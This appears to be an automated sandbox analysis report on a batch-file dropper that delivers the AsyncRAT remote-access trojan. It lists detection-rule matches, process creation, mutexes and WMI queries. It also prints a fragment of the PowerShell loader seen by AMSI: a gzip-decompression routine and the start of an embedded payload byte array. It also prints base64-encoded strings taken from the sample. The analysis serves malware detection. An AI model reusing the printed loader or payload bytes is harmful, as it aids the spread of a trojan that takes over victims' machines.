                      Source: 19.2.powershell.exe.257018be6f0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                      Source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                      Source: 19.2.powershell.exe.257018be6f0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                      Source: 19.2.powershell.exe.25702485170.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                      Source: 19.2.powershell.exe.25702485170.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                      Source: 19.2.powershell.exe.25701854fd0.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                      Source: 19.2.powershell.exe.25701854fd0.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                      Source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                      Source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                      Source: 19.2.powershell.exe.25701870610.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                      Source: 19.2.powershell.exe.25701870610.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                      Source: 19.2.powershell.exe.257018be6f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                      Source: 19.2.powershell.exe.25701870610.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                      Source: 00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                      Source: 00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                      Source: 00000013.00000002.1753014941.0000025703E64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                      Source: 00000013.00000002.1753014941.0000025703E64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                      Source: 00000013.00000002.1753014941.0000025702269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                      Source: 00000013.00000002.1753014941.0000025701869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                      Source: 00000013.00000002.1753014941.00000257013AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                      Source: Process Memory Space: powershell.exe PID: 2216, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: aspnet_compiler.exe PID: 6676, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                      Source: 19.2.powershell.exe.25703985aa8.4.raw.unpack, c49e11983285d4ab2e059050de6df5a41.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                      Source: 19.2.powershell.exe.2576eee0000.8.raw.unpack, c49e11983285d4ab2e059050de6df5a41.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                      Source: 19.2.powershell.exe.25702485170.7.raw.unpack, jlsfKWsjaVv.csBase64 encoded string: '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', 'nRv20pY7uhKCOgv4rOWdh0m5CUOmDH8tXQN
                      Source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, jlsfKWsjaVv.csBase64 encoded string: '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', 'nRv20pY7uhKCOgv4rOWdh0m5CUOmDH8tXQN
                      Source: 19.2.powershell.exe.25702485170.7.raw.unpack, uZZaicMPQoeTt.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 19.2.powershell.exe.25702485170.7.raw.unpack, uZZaicMPQoeTt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, uZZaicMPQoeTt.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, uZZaicMPQoeTt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.expl.evad.winBAT@38/13@5/4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\AXAGFIIEZBBS.batJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_03
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: NULL
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5784:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_acrgl1pt.tjp.ps1Jump to behavior
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Pe4905VGl1.bat" "
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress) $gzipStream.CopyTo( $output ) $gzipStream.Close()$input.Close()[byte[]] $byteOutArray = $output.ToArray() Write-Output $byteOutArray }}[byte[]] $TZPFISFK = VHPDGARDLG(31,139,8,0,0,0,0,0,4,0,180,125,9,124,91,197,209,248,190,39,249,233,240,145,200,135,108,199,103,14,59,178,115,135,0,78,76,14,29,182,37,75,178,37,203,151,20,46,157,150,100,73,79,126,146,108,203,33,33,148,163,64,9,148,82,10,129,82,110,90,218,242,81,74,251,81,10,124,92,133,148,82,248,56,219,114,164,37,208,146,30,20,62,10,95,41,45,199,127,102,223,211,97,199,161,244,251,253,75,235,121,51,179,179,179,179,179,187,179,199,219,167,216,61,95,38,50,66,136,28,254,62,253,148,144,31,17,241,191,93,228,159,255,183,31,254,42,90,126,92,65,126,160,122,106,249,143,24,219,83,203,135,195,145,84,107,82,224,39,4,111,188,213,239,77,36,248,116,171,47,216,42,100,18,173,145,68,171,105,208,213,26,231,3,193,245,229,229,234,85,146,14,71,15,33,54,70,70,50,151,109,9,228,244,190,70,88,166,148,81,18,242,17,16,106,145,247,141,101,12,33,173,128,180,50,162,117,136,179,162,221,132,20,158,228,76,134,242,9,77,62,243,124,66,150,210,255,23,158,249,7,253,207,4,122,199,136,168,247,83,197,34,149,220,197,144,178,207,225,139,99,254,3,251,148,69,164,18,104,115,17,189,62,29,156,77,195,243,150,191,139,178,180,174,236,49,42,206,92,47,164,4,63,224,212,54,172,59,42,253,100,129,137,240,255,245,66,48,198,131,96,153,100,51,213,197,49,11,229,12,11,205,220,191,76,148,49,211,226,75,200,218,57,66,234,110,32,180,79,64,10,247,185,235,43,253,247,224,159,154,71,255,241,212,85,221,223,175,103,87,109,188,117,214,72,182,143,154,158,107,246,221,251,194,187,251,143,190,249,232,86,253,122,178,129,156,10,114,205,172,174,1,26,183,115,217,190,106,104,188,206,102,118,63,125,46,219,87,35,145,53,34,169,149,72,173,72,214,74,100,173,72,214,73,100,157,72,214,75,100,189,72,46,147,200,101,34,217,32,62,26,37,110,163,72,54,73,100,147,72,54,75,36,125,118,178,58,61,24,169,253,68,214,185,121,95,41,112,100,188,1,141,94,159,66,219,247,83,133,111,234,58,192,77,219,116,80,39,93,39,98,205,136,173,65,172,26,177,213,136,97,39,214,129,8,183,21,29,90,173,203,162,150,125,45,141,186,235,81,79,11,232,105,89,38,226,208,230,114,237,254,229,168,121,116,95,27,60,116,39,64,182,253,237,136,221,128,185,254,34,220,218,77,146,186,239,0,46,220,137,152,128,217,86,64,122,245,39,220,22,144,77,25,49,3,102,221,247,93,76,194,172,45,229,251,87,83,149,186,187,129,149,250,1,128,214,86,232,33,252,15,81,165,239,108,168,130,252,147,26,232,59,172,54,154,122,20,115,117,162,120,98,223,6,120,108,197,241,66,49,254,49,72,170,222,143,104,231,190,125,75,209,38,104,8,245,214,37,88,61,43,86,175,4,49,104,95,174,115,84,200,158,66,146,251,52,40,68,77,220,130,185,254,43,117,47,36,182,9,53,43,72,146,191,5,80,225,174,93,128,221,5,24,255,31,0,116,80,127,174,245,247,208,251,116,213,104,218,203,199,200,255,178,91,146,111,19,81,100,178,11,20,64,3,253,15,22,121,34,22,185,62,21,71,135,156,140,248,31,143,81,247,44,22,127,27,101,174,203,49,117,239,67,102,2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "CCleanerBrowser.exe")
                      Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "aspnet_regbrowsers.exe")
                      Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "aspnet_compiler.exe")
                      Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AppLaunch.exe")
                      Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "InstallUtil.exe")
                      Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "jsc.exe")
                      Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MSBuild.exe")
                      Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "RegAsm.exe")
                      Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "cvtres.exe")
                      Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "RegSvcs.exe")
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
